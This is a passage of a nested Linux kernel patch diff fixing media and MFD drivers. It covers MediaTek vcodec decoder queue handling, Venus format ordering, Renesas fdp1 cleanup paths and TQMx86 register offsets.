++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_hw.c
+@@ -193,8 +193,16 @@ err:
+ 	return ret;
+ }
+ 
++static int mtk_vdec_hw_remove(struct platform_device *pdev)
++{
++	pm_runtime_disable(&pdev->dev);
++
++	return 0;
++}
++
+ static struct platform_driver mtk_vdec_driver = {
+ 	.probe	= mtk_vdec_hw_probe,
++	.remove = mtk_vdec_hw_remove,
+ 	.driver	= {
+ 		.name	= "mtk-vdec-comp",
+ 		.of_match_table = mtk_vdec_hw_match,
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+index 035c86e7809fd..29991551cf614 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+@@ -11,7 +11,7 @@
+ #include "mtk_vcodec_dec_pm.h"
+ #include "vdec_drv_if.h"
+ 
+-static const struct mtk_video_fmt mtk_video_formats[] = {
++static struct mtk_video_fmt mtk_video_formats[] = {
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_H264,
+ 		.type = MTK_FMT_DEC,
+@@ -580,6 +580,16 @@ static int mtk_vcodec_dec_ctrls_setup(struct mtk_vcodec_ctx *ctx)
+ 
+ static void mtk_init_vdec_params(struct mtk_vcodec_ctx *ctx)
+ {
++	unsigned int i;
++
++	if (!(ctx->dev->dec_capability & VCODEC_CAPABILITY_4K_DISABLED)) {
++		for (i = 0; i < num_supported_formats; i++) {
++			mtk_video_formats[i].frmsize.max_width =
++				VCODEC_DEC_4K_CODED_WIDTH;
++			mtk_video_formats[i].frmsize.max_height =
++				VCODEC_DEC_4K_CODED_HEIGHT;
++		}
++	}
+ }
+ 
+ static struct vb2_ops mtk_vdec_frame_vb2_ops = {
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+index ffbcee04dc26f..3000db975e5f5 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+@@ -258,8 +258,10 @@ static void mtk_vdec_worker(struct work_struct *work)
+ 		if (src_buf_req)
+ 			v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+ 	} else {
+-		v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
+-		v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		if (ret != -EAGAIN) {
++			v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
++			v4l2_m2m_buf_done(vb2_v4l2_src, state);
++		}
+ 		v4l2_m2m_job_finish(dev->m2m_dev_dec, ctx->m2m_ctx);
+ 	}
+ }
+@@ -390,14 +392,14 @@ static void mtk_vcodec_get_supported_formats(struct mtk_vcodec_ctx *ctx)
+ 	if (num_formats)
+ 		return;
+ 
+-	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
+-		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
+-		cap_format_count++;
+-	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MT21C) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_MT21C, ctx);
+ 		cap_format_count++;
+ 	}
++	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_MM21) {
++		mtk_vcodec_add_formats(V4L2_PIX_FMT_MM21, ctx);
++		cap_format_count++;
++	}
+ 	if (ctx->dev->dec_capability & MTK_VDEC_FORMAT_H264_SLICE) {
+ 		mtk_vcodec_add_formats(V4L2_PIX_FMT_H264_SLICE, ctx);
+ 		out_format_count++;
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+index 955b2d0c8f53f..999ce7ee5fdc2 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+@@ -597,7 +597,7 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&inst->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(inst, "failed to get lat buffer");
+-		return -EINVAL;
++		return -EAGAIN;
+ 	}
+ 	share_info = lat_buf->private_data;
+ 	src_buf_info = container_of(bs, struct mtk_video_dec_buf, bs_buffer);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+index cbb6728b8a40b..cf16cf2807f07 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+@@ -2070,7 +2070,7 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	lat_buf = vdec_msg_queue_dqbuf(&instance->ctx->msg_queue.lat_ctx);
+ 	if (!lat_buf) {
+ 		mtk_vcodec_err(instance, "Failed to get VP9 lat buf\n");
+-		return -EBUSY;
++		return -EAGAIN;
+ 	}
+ 	pfc = (struct vdec_vp9_slice_pfc *)lat_buf->private_data;
+ 	if (!pfc) {
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index dc2004790a472..f3073d1e7f420 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -52,9 +52,26 @@ static struct list_head *vdec_get_buf_list(int hardware_index, struct vdec_lat_b
+ 	}
+ }
+ 
++static void vdec_msg_queue_inc(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_inc(&msg_queue->core_list_cnt);
++	else
++		atomic_inc(&msg_queue->lat_list_cnt);
++}
++
++static void vdec_msg_queue_dec(struct vdec_msg_queue *msg_queue, int hardware_index)
++{
++	if (hardware_index == MTK_VDEC_CORE)
++		atomic_dec(&msg_queue->core_list_cnt);
++	else
++		atomic_dec(&msg_queue->lat_list_cnt);
++}
++
+ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf *buf)
+ {
+ 	struct list_head *head;
++	int status;
+ 
+ 	head = vdec_get_buf_list(msg_ctx->hardware_index, buf);
+ 	if (!head) {
+@@ -66,11 +83,18 @@ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf
+ 	list_add_tail(head, &msg_ctx->ready_queue);
+ 	msg_ctx->ready_num++;
+ 
+-	if (msg_ctx->hardware_index != MTK_VDEC_CORE)
++	vdec_msg_queue_inc(&buf->ctx->msg_queue, msg_ctx->hardware_index);
++	if (msg_ctx->hardware_index != MTK_VDEC_CORE) {
+ 		wake_up_all(&msg_ctx->ready_to_use);
+-	else
+-		queue_work(buf->ctx->dev->core_workqueue,
+-			   &buf->ctx->msg_queue.core_work);
++	} else {
++		if (buf->ctx->msg_queue.core_work_cnt <
++			atomic_read(&buf->ctx->msg_queue.core_list_cnt)) {
++			status = queue_work(buf->ctx->dev->core_workqueue,
++					    &buf->ctx->msg_queue.core_work);
++			if (status)
++				buf->ctx->msg_queue.core_work_cnt++;
++		}
++	}
+ 
+ 	mtk_v4l2_debug(3, "enqueue buf type: %d addr: 0x%p num: %d",
+ 		       msg_ctx->hardware_index, buf, msg_ctx->ready_num);
+@@ -127,6 +151,7 @@ struct vdec_lat_buf *vdec_msg_queue_dqbuf(struct vdec_msg_queue_ctx *msg_ctx)
+ 		return NULL;
+ 	}
+ 	list_del(head);
++	vdec_msg_queue_dec(&buf->ctx->msg_queue, msg_ctx->hardware_index);
+ 
+ 	msg_ctx->ready_num--;
+ 	mtk_v4l2_debug(3, "dqueue buf type:%d addr: 0x%p num: %d",
+@@ -156,11 +181,29 @@ void vdec_msg_queue_update_ube_wptr(struct vdec_msg_queue *msg_queue, uint64_t u
+ 
+ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ {
++	struct vdec_lat_buf *buf, *tmp;
++	struct list_head *list_core[3];
++	struct vdec_msg_queue_ctx *core_ctx;
++	int ret, i, in_core_count = 0, count = 0;
+ 	long timeout_jiff;
+-	int ret;
++
++	core_ctx = &msg_queue->ctx->dev->msg_queue_core_ctx;
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			list_core[in_core_count++] = &buf->core_list;
++			list_del(&buf->core_list);
++		}
++	}
++
++	for (i = 0; i < in_core_count; i++) {
++		list_add(list_core[in_core_count - (1 + i)], &core_ctx->ready_queue);
++		queue_work(msg_queue->ctx->dev->core_workqueue, &msg_queue->core_work);
++	}
++	spin_unlock(&core_ctx->ready_lock);
+ 
+ 	timeout_jiff = msecs_to_jiffies(1000 * (NUM_BUFFER_COUNT + 2));
+-	ret = wait_event_timeout(msg_queue->lat_ctx.ready_to_use,
++	ret = wait_event_timeout(msg_queue->ctx->msg_queue.core_dec_done,
+ 				 msg_queue->lat_ctx.ready_num == NUM_BUFFER_COUNT,
+ 				 timeout_jiff);
+ 	if (ret) {
+@@ -168,8 +211,20 @@ bool vdec_msg_queue_wait_lat_buf_full(struct vdec_msg_queue *msg_queue)
+ 			       msg_queue->lat_ctx.ready_num);
+ 		return true;
+ 	}
+-	mtk_v4l2_err("failed with lat buf isn't full: %d",
+-		     msg_queue->lat_ctx.ready_num);
++
++	spin_lock(&core_ctx->ready_lock);
++	list_for_each_entry_safe(buf, tmp, &core_ctx->ready_queue, core_list) {
++		if (buf && buf->ctx == msg_queue->ctx) {
++			count++;
++			list_del(&buf->core_list);
++		}
++	}
++	spin_unlock(&core_ctx->ready_lock);
++
++	mtk_v4l2_err("failed with lat buf isn't full: list(%d %d) count:%d",
++		     atomic_read(&msg_queue->lat_list_cnt),
++		     atomic_read(&msg_queue->core_list_cnt), count);
++
+ 	return false;
+ }
+ 
+@@ -206,6 +261,7 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 		container_of(msg_queue, struct mtk_vcodec_ctx, msg_queue);
+ 	struct mtk_vcodec_dev *dev = ctx->dev;
+ 	struct vdec_lat_buf *lat_buf;
++	int status;
+ 
+ 	lat_buf = vdec_msg_queue_dqbuf(&dev->msg_queue_core_ctx);
+ 	if (!lat_buf)
+@@ -221,11 +277,18 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	mtk_vcodec_dec_disable_hardware(ctx, MTK_VDEC_CORE);
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+-	if (!list_empty(&dev->msg_queue_core_ctx.ready_queue)) {
+-		mtk_v4l2_debug(3, "re-schedule to decode for core: %d",
+-			       dev->msg_queue_core_ctx.ready_num);
+-		queue_work(dev->core_workqueue, &msg_queue->core_work);
++	wake_up_all(&ctx->msg_queue.core_dec_done);
++	spin_lock(&dev->msg_queue_core_ctx.ready_lock);
++	lat_buf->ctx->msg_queue.core_work_cnt--;
++
++	if (lat_buf->ctx->msg_queue.core_work_cnt <
++		atomic_read(&lat_buf->ctx->msg_queue.core_list_cnt)) {
++		status = queue_work(lat_buf->ctx->dev->core_workqueue,
++				    &lat_buf->ctx->msg_queue.core_work);
++		if (status)
++			lat_buf->ctx->msg_queue.core_work_cnt++;
+ 	}
++	spin_unlock(&dev->msg_queue_core_ctx.ready_lock);
+ }
+ 
+ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+@@ -239,12 +302,18 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 	if (msg_queue->wdma_addr.size)
+ 		return 0;
+ 
++	msg_queue->ctx = ctx;
++	msg_queue->core_work_cnt = 0;
+ 	vdec_msg_queue_init_ctx(&msg_queue->lat_ctx, MTK_VDEC_LAT0);
+ 	INIT_WORK(&msg_queue->core_work, vdec_msg_queue_core_work);
++
++	atomic_set(&msg_queue->lat_list_cnt, 0);
++	atomic_set(&msg_queue->core_list_cnt, 0);
++	init_waitqueue_head(&msg_queue->core_dec_done);
++
+ 	msg_queue->wdma_addr.size =
+ 		vde_msg_queue_get_trans_size(ctx->picinfo.buf_w,
+ 					     ctx->picinfo.buf_h);
+-
+ 	err = mtk_vcodec_mem_alloc(ctx, &msg_queue->wdma_addr);
+ 	if (err) {
+ 		mtk_v4l2_err("failed to allocate wdma_addr buf");
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+index c43d427f5f544..a5d44bc97c16b 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+@@ -72,6 +72,12 @@ struct vdec_lat_buf {
+  * @wdma_wptr_addr: ube write point
+  * @core_work: core hardware work
+  * @lat_ctx: used to store lat buffer list
++ * @ctx: point to mtk_vcodec_ctx
++ *
++ * @lat_list_cnt: used to record each instance lat list count
++ * @core_list_cnt: used to record each instance core list count
++ * @core_dec_done: core work queue decode done event
++ * @core_work_cnt: the number of core work in work queue
+  */
+ struct vdec_msg_queue {
+ 	struct vdec_lat_buf lat_buf[NUM_BUFFER_COUNT];
+@@ -82,6 +88,12 @@ struct vdec_msg_queue {
+ 
+ 	struct work_struct core_work;
+ 	struct vdec_msg_queue_ctx lat_ctx;
++	struct mtk_vcodec_ctx *ctx;
++
++	atomic_t lat_list_cnt;
++	atomic_t core_list_cnt;
++	wait_queue_head_t core_dec_done;
++	int core_work_cnt;
+ };
+ 
+ /**
+diff --git a/drivers/media/platform/qcom/venus/vdec.c b/drivers/media/platform/qcom/venus/vdec.c
+index 4ceaba37e2e57..1a52c2ea2da5b 100644
+--- a/drivers/media/platform/qcom/venus/vdec.c
++++ b/drivers/media/platform/qcom/venus/vdec.c
+@@ -31,15 +31,15 @@
+  */
+ static const struct venus_format vdec_formats[] = {
+ 	{
+-		.pixfmt = V4L2_PIX_FMT_QC08C,
++		.pixfmt = V4L2_PIX_FMT_NV12,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+-		.pixfmt = V4L2_PIX_FMT_QC10C,
++		.pixfmt = V4L2_PIX_FMT_QC08C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+-	},{
+-		.pixfmt = V4L2_PIX_FMT_NV12,
++	}, {
++		.pixfmt = V4L2_PIX_FMT_QC10C,
+ 		.num_planes = 1,
+ 		.type = V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE,
+ 	}, {
+@@ -526,6 +526,7 @@ static int
+ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ {
+ 	struct venus_inst *inst = to_inst(file);
++	struct vb2_queue *dst_vq;
+ 	struct hfi_frame_data fdata = {0};
+ 	int ret;
+ 
+@@ -556,6 +557,13 @@ vdec_decoder_cmd(struct file *file, void *fh, struct v4l2_decoder_cmd *cmd)
+ 			inst->codec_state = VENUS_DEC_STATE_DRAIN;
+ 			inst->drain_active = true;
+ 		}
++	} else if (cmd->cmd == V4L2_DEC_CMD_START &&
++		   inst->codec_state == VENUS_DEC_STATE_STOPPED) {
++		dst_vq = v4l2_m2m_get_vq(inst->fh.m2m_ctx,
++					 V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE);
++		vb2_clear_last_buffer_dequeued(dst_vq);
++
++		inst->codec_state = VENUS_DEC_STATE_DECODING;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/media/platform/renesas/rcar_fdp1.c b/drivers/media/platform/renesas/rcar_fdp1.c
+index 37ecf489d112e..c548cb01957b0 100644
+--- a/drivers/media/platform/renesas/rcar_fdp1.c
++++ b/drivers/media/platform/renesas/rcar_fdp1.c
+@@ -2313,8 +2313,10 @@ static int fdp1_probe(struct platform_device *pdev)
+ 
+ 	/* Determine our clock rate */
+ 	clk = clk_get(&pdev->dev, NULL);
+-	if (IS_ERR(clk))
+-		return PTR_ERR(clk);
++	if (IS_ERR(clk)) {
++		ret = PTR_ERR(clk);
++		goto put_dev;
++	}
+ 
+ 	fdp1->clk_rate = clk_get_rate(clk);
+ 	clk_put(clk);
+@@ -2323,7 +2325,7 @@ static int fdp1_probe(struct platform_device *pdev)
+ 	ret = v4l2_device_register(&pdev->dev, &fdp1->v4l2_dev);
+ 	if (ret) {
+ 		v4l2_err(&fdp1->v4l2_dev, "Failed to register video device\n");
+-		return ret;
++		goto put_dev;
+ 	}
+ 
+ 	/* M2M registration */
+@@ -2393,10 +2395,12 @@ release_m2m:
+ unreg_dev:
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 
++put_dev:
++	rcar_fcp_put(fdp1->fcp);
+ 	return ret;
+ }
+ 
+-static int fdp1_remove(struct platform_device *pdev)
++static void fdp1_remove(struct platform_device *pdev)
+ {
+ 	struct fdp1_dev *fdp1 = platform_get_drvdata(pdev);
+ 
+@@ -2404,8 +2408,7 @@ static int fdp1_remove(struct platform_device *pdev)
+ 	video_unregister_device(&fdp1->vfd);
+ 	v4l2_device_unregister(&fdp1->v4l2_dev);
+ 	pm_runtime_disable(&pdev->dev);
+-
+-	return 0;
++	rcar_fcp_put(fdp1->fcp);
+ }
+ 
+ static int __maybe_unused fdp1_pm_runtime_suspend(struct device *dev)
+@@ -2441,7 +2444,7 @@ MODULE_DEVICE_TABLE(of, fdp1_dt_ids);
+ 
+ static struct platform_driver fdp1_pdrv = {
+ 	.probe		= fdp1_probe,
+-	.remove		= fdp1_remove,
++	.remove_new	= fdp1_remove,
+ 	.driver		= {
+ 		.name	= DRIVER_NAME,
+ 		.of_match_table = fdp1_dt_ids,
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_video.c b/drivers/media/platform/renesas/vsp1/vsp1_video.c
+index 9d24647c8f324..0cea5e5acf82b 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_video.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_video.c
+@@ -776,7 +776,7 @@ static void vsp1_video_buffer_queue(struct vb2_buffer *vb)
+ 	video->rwpf->mem = buf->mem;
+ 	pipe->buffers_ready |= 1 << video->pipe_index;
+ 
+-	if (vb2_is_streaming(&video->queue) &&
++	if (vb2_start_streaming_called(&video->queue) &&
+ 	    vsp1_pipeline_ready(pipe))
+ 		vsp1_video_pipeline_run(pipe);
+ 
+diff --git a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+index dd74cc43920d3..080da254b9109 100644
+--- a/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
++++ b/drivers/media/platform/st/sti/bdisp/bdisp-v4l2.c
+@@ -1309,6 +1309,8 @@ static int bdisp_probe(struct platform_device *pdev)
+ 	init_waitqueue_head(&bdisp->irq_queue);
+ 	INIT_DELAYED_WORK(&bdisp->timeout_work, bdisp_irq_timeout);
+ 	bdisp->work_queue = create_workqueue(BDISP_NAME);
++	if (!bdisp->work_queue)
++		return -ENOMEM;
+ 
+ 	spin_lock_init(&bdisp->slock);
+ 	mutex_init(&bdisp->lock);
+diff --git a/drivers/media/rc/gpio-ir-recv.c b/drivers/media/rc/gpio-ir-recv.c
+index 8dbe780dae4e7..41ef8cdba28c4 100644
+--- a/drivers/media/rc/gpio-ir-recv.c
++++ b/drivers/media/rc/gpio-ir-recv.c
+@@ -103,6 +103,8 @@ static int gpio_ir_recv_probe(struct platform_device *pdev)
+ 		rcdev->map_name = RC_MAP_EMPTY;
+ 
+ 	gpio_dev->rcdev = rcdev;
++	if (of_property_read_bool(np, "wakeup-source"))
++		device_init_wakeup(dev, true);
+ 
+ 	rc = devm_rc_register_device(dev, rcdev);
+ 	if (rc < 0) {
+diff --git a/drivers/media/v4l2-core/v4l2-async.c b/drivers/media/v4l2-core/v4l2-async.c
+index 2f1b718a91893..008a2a3e312e0 100644
+--- a/drivers/media/v4l2-core/v4l2-async.c
++++ b/drivers/media/v4l2-core/v4l2-async.c
+@@ -414,7 +414,8 @@ static void v4l2_async_cleanup(struct v4l2_subdev *sd)
+ 
+ /* Unbind all sub-devices in the notifier tree. */
+ static void
+-v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
++v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier,
++				 bool readd)
+ {
+ 	struct v4l2_subdev *sd, *tmp;
+ 
+@@ -423,9 +424,11 @@ v4l2_async_nf_unbind_all_subdevs(struct v4l2_async_notifier *notifier)
+ 			v4l2_async_find_subdev_notifier(sd);
+ 
+ 		if (subdev_notifier)
+-			v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++			v4l2_async_nf_unbind_all_subdevs(subdev_notifier, true);
+ 
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
++		if (readd)
++			list_add_tail(&sd->asd->list, &notifier->waiting);
+ 		v4l2_async_cleanup(sd);
+ 
+ 		list_move(&sd->async_list, &subdev_list);
+@@ -557,7 +560,7 @@ err_unbind:
+ 	/*
+ 	 * On failure, unbind all sub-devices registered through this notifier.
+ 	 */
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ err_unlock:
+ 	mutex_unlock(&list_lock);
+@@ -607,7 +610,7 @@ __v4l2_async_nf_unregister(struct v4l2_async_notifier *notifier)
+ 	if (!notifier || (!notifier->v4l2_dev && !notifier->sd))
+ 		return;
+ 
+-	v4l2_async_nf_unbind_all_subdevs(notifier);
++	v4l2_async_nf_unbind_all_subdevs(notifier, false);
+ 
+ 	notifier->sd = NULL;
+ 	notifier->v4l2_dev = NULL;
+@@ -805,7 +808,7 @@ err_unbind:
+ 	 */
+ 	subdev_notifier = v4l2_async_find_subdev_notifier(sd);
+ 	if (subdev_notifier)
+-		v4l2_async_nf_unbind_all_subdevs(subdev_notifier);
++		v4l2_async_nf_unbind_all_subdevs(subdev_notifier, false);
+ 
+ 	if (sd->asd)
+ 		v4l2_async_nf_call_unbind(notifier, sd, sd->asd);
+diff --git a/drivers/mfd/arizona-spi.c b/drivers/mfd/arizona-spi.c
+index da05b966d48c6..02cf4f3e91d76 100644
+--- a/drivers/mfd/arizona-spi.c
++++ b/drivers/mfd/arizona-spi.c
+@@ -277,6 +277,7 @@ static const struct of_device_id arizona_spi_of_match[] = {
+ 	{ .compatible = "cirrus,cs47l24", .data = (void *)CS47L24 },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, arizona_spi_of_match);
+ #endif
+ 
+ static struct spi_driver arizona_spi_driver = {
+diff --git a/drivers/mfd/ocelot-spi.c b/drivers/mfd/ocelot-spi.c
+index 2ecd271de2fb9..85021f94e5874 100644
+--- a/drivers/mfd/ocelot-spi.c
++++ b/drivers/mfd/ocelot-spi.c
+@@ -130,6 +130,7 @@ static const struct regmap_config ocelot_spi_regmap_config = {
+ 
+ 	.write_flag_mask = 0x80,
+ 
++	.use_single_read = true,
+ 	.use_single_write = true,
+ 	.can_multi_write = false,
+ 
+diff --git a/drivers/mfd/tqmx86.c b/drivers/mfd/tqmx86.c
+index 7ae906ff8e353..fac02875fe7d9 100644
+--- a/drivers/mfd/tqmx86.c
++++ b/drivers/mfd/tqmx86.c
+@@ -16,8 +16,8 @@
+ #include <linux/platform_data/i2c-ocores.h>
+ #include <linux/platform_device.h>
+ 
+-#define TQMX86_IOBASE	0x160
+-#define TQMX86_IOSIZE	0x3f
++#define TQMX86_IOBASE	0x180
++#define TQMX86_IOSIZE	0x20
+ #define TQMX86_IOBASE_I2C	0x1a0
+ #define TQMX86_IOSIZE_I2C	0xa
+ #define TQMX86_IOBASE_WATCHDOG	0x18b
+@@ -25,14 +25,14 @@
+ #define TQMX86_IOBASE_GPIO	0x18d
+ #define TQMX86_IOSIZE_GPIO	0x4
+ 
+-#define TQMX86_REG_BOARD_ID	0x20
++#define TQMX86_REG_BOARD_ID	0x00
+ #define TQMX86_REG_BOARD_ID_E38M	1
+ #define TQMX86_REG_BOARD_ID_50UC	2
+ #define TQMX86_REG_BOARD_ID_E38C	3
+ #define TQMX86_REG_BOARD_ID_60EB	4
+-#define TQMX86_REG_BOARD_ID_E39M	5
+-#define TQMX86_REG_BOARD_ID_E39C	6
+-#define TQMX86_REG_BOARD_ID_E39x	7
++#define TQMX86_REG_BOARD_ID_E39MS	5
++#define TQMX86_REG_BOARD_ID_E39C1	6
++#define TQMX86_REG_BOARD_ID_E39C2	7
+ #define TQMX86_REG_BOARD_ID_70EB	8
+ #define TQMX86_REG_BOARD_ID_80UC	9
+ #define TQMX86_REG_BOARD_ID_110EB	11
+@@ -40,18 +40,18 @@
+ #define TQMX86_REG_BOARD_ID_E40S	13
+ #define TQMX86_REG_BOARD_ID_E40C1	14
+ #define TQMX86_REG_BOARD_ID_E40C2	15
+-#define TQMX86_REG_BOARD_REV	0x21
+-#define TQMX86_REG_IO_EXT_INT	0x26
++#define TQMX86_REG_BOARD_REV	0x01
++#define TQMX86_REG_IO_EXT_INT	0x06
+ #define TQMX86_REG_IO_EXT_INT_NONE		0
+ #define TQMX86_REG_IO_EXT_INT_7			1
+ #define TQMX86_REG_IO_EXT_INT_9			2
+ #define TQMX86_REG_IO_EXT_INT_12		3
+ #define TQMX86_REG_IO_EXT_INT_MASK		0x3
+ #define TQMX86_REG_IO_EXT_INT_GPIO_SHIFT	4
++#define TQMX86_REG_SAUC		0x17
+ 
+-#define TQMX86_REG_I2C_DETECT	0x47
++#define TQMX86_REG_I2C_DETECT	0x1a7
+ #define TQMX86_REG_I2C_DETECT_SOFT		0xa5
+-#define TQMX86_REG_I2C_INT_EN	0x49
+ 
+ static uint gpio_irq;
+ module_param(gpio_irq, uint, 0);
+@@ -111,7 +111,7 @@ static const struct mfd_cell tqmx86_devs[] = {
+ 	},
+ };
+ 
+-static const char *tqmx86_board_id_to_name(u8 board_id)
++static const char *tqmx86_board_id_to_name(u8 board_id, u8 sauc)
+ {
+ 	switch (board_id) {
+ 	case TQMX86_REG_BOARD_ID_E38M:
+@@ -122,12 +122,12 @@ static const char *tqmx86_board_id_to_name(u8 board_id)
+ 		return "TQMxE38C";
+ 	case TQMX86_REG_BOARD_ID_60EB:
+ 		return "TQMx60EB";
+-	case TQMX86_REG_BOARD_ID_E39M:
+-		return "TQMxE39M";
+-	case TQMX86_REG_BOARD_ID_E39C:
+-		return "TQMxE39C";
+-	case TQMX86_REG_BOARD_ID_E39x:
+-		return "TQMxE39x";
++	case TQMX86_REG_BOARD_ID_E39MS:
++		return (sauc == 0xff) ? "TQMxE39M" : "TQMxE39S";
++	case TQMX86_REG_BOARD_ID_E39C1:
++		return "TQMxE39C1";
++	case TQMX86_REG_BOARD_ID_E39C2:
++		return "TQMxE39C2";
+ 	case TQMX86_REG_BOARD_ID_70EB:
+ 		return "TQMx70EB";
+ 	case TQMX86_REG_BOARD_ID_80UC:
+@@ -160,9 +160,9 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 	case TQMX86_REG_BOARD_ID_E40C1:
+ 	case TQMX86_REG_BOARD_ID_E40C2:
+ 		return 24000;
+-	case TQMX86_REG_BOARD_ID_E39M:
+-	case TQMX86_REG_BOARD_ID_E39C:
+-	case TQMX86_REG_BOARD_ID_E39x:
++	case TQMX86_REG_BOARD_ID_E39MS:
++	case TQMX86_REG_BOARD_ID_E39C1:
++	case TQMX86_REG_BOARD_ID_E39C2:
+ 		return 25000;
+ 	case TQMX86_REG_BOARD_ID_E38M:
+ 	case TQMX86_REG_BOARD_ID_E38C:
+@@ -176,7 +176,7 @@ static int tqmx86_board_id_to_clk_rate(struct device *dev, u8 board_id)
+ 
+ static int tqmx86_probe(struct platform_device *pdev)
+ {
+-	u8 board_id, rev, i2c_det, io_ext_int_val;
++	u8 board_id, sauc, rev, i2c_det, io_ext_int_val;
+ 	struct device *dev = &pdev->dev;
+ 	u8 gpio_irq_cfg, readback;
+ 	const char *board_name;
+@@ -206,14 +206,20 @@ static int tqmx86_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	board_id = ioread8(io_base + TQMX86_REG_BOARD_ID);
+-	board_name = tqmx86_board_id_to_name(board_id);
++	sauc = ioread8(io_base + TQMX86_REG_SAUC);
++	board_name = tqmx86_board_id_to_name(board_id, sauc);
+ 	rev = ioread8(io_base + TQMX86_REG_BOARD_REV);
+ 
+ 	dev_info(dev,
+ 		 "Found %s - Board ID %d, PCB Revision %d, PLD Revision %d\n",
+ 		 board_name, board_id, rev >> 4, rev & 0xf);
+ 
+-	i2c_det = ioread8(io_base + TQMX86_REG_I2C_DETECT);
++	/*
++	 * The I2C_DETECT register is in the range assigned to the I2C driver
++	 * later, so we don't extend TQMX86_IOSIZE. Use inb() for this one-off
++	 * access instead of ioport_map + unmap.
++	 */
++	i2c_det = inb(TQMX86_REG_I2C_DETECT);
+ 
+ 	if (gpio_irq_cfg) {
+ 		io_ext_int_val =
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
